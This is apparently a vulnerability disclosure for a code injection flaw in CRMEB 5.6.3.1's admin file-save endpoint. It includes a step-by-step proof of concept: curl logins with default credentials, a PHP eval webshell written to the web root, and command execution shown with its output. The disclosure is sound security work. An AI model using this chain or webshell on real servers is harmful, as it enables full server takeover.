CRMEB 5.6.3.1 Code Injection Vulnerability

[cyl-love]

Supplier

https://github.com/crmeb/crmeb

Vulnerability File

app/adminapi/controller/v1/system/SystemFile.php

Vulnerability Type

Code Injection (CWE-94)

Severity

Critical

Describe

Code analysis

In the app/adminapi/controller/v1/system/SystemFile.php file, the savefile function allows administrators to write arbitrary content to any file path, enabling code injection attacks.

// Line 113-126
public function savefile()
{
    $comment = $this->request->param('comment');  // User-controlled content
    $filepath = $this->request->param('filepath');  // User-controlled path
    
    if (empty($filepath)) {
        return app('json')->fail('文件路径不存在');
    }
    
    // No validation of:
    // - File path (can write to any location)
    // - File content (can write PHP code)
    // - File extension (can create .php files)
    
    $res = $this->services->savefile($filepath, $comment);
    
    if ($res) {
        return app('json')->success('保存成功');
    }
    return app('json')->fail('保存失败');
}

The vulnerability exists because:

1. No path validation - can write to any directory
2. No content validation - can write arbitrary code
3. No file extension restrictions - can create .php files
4. No malicious code detection - can inject webshells

POC

POST /adminapi/system/file/savefile HTTP/1.1
Host: target.com
Authorization: Bearer {admin_token}
Content-Type: application/json

{"filepath":"/var/www/public/shell.php","comment":"<?php @eval($_POST['cmd']);?>","fileToken":"{file_token}"}

Step 1: Login to get admin token

curl -X POST "http://target.com/adminapi/login" \
  -H "Content-Type: application/json" \
  -d '{"account":"admin","pwd":"admin123"}'

Step 2: Get file management token

curl -X POST "http://target.com/adminapi/system/file/login" \
  -H "Authorization: Bearer YOUR_ADMIN_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"password":"123456"}'

Step 3: Write webshell

curl -X POST "http://target.com/adminapi/system/file/savefile" \
  -H "Authorization: Bearer YOUR_ADMIN_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"filepath":"/var/www/public/shell.php","comment":"<?php @eval($_POST[\"cmd\"]);?>","fileToken":"YOUR_FILE_TOKEN"}'

Step 4: Execute webshell

curl -X POST "http://target.com/shell.php" \
  -d "cmd=system('id');"

Result

Code injection confirmed. Can write webshell and execute arbitrary PHP code.

[*] Webshell written successfully
[*] Command execution confirmed
[*] Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)

Impact

An attacker can:

• Execute arbitrary PHP code on the server
• Gain remote shell access
• Read, modify, or delete any files
• Access database credentials
• Pivot to other internal systems
• Fully compromise the server

Vendor Contact

admin@crmeb.com

References

• CWE-94: Improper Control of Generation of Code ('Code Injection')
• https://cwe.mitre.org/data/definitions/94.html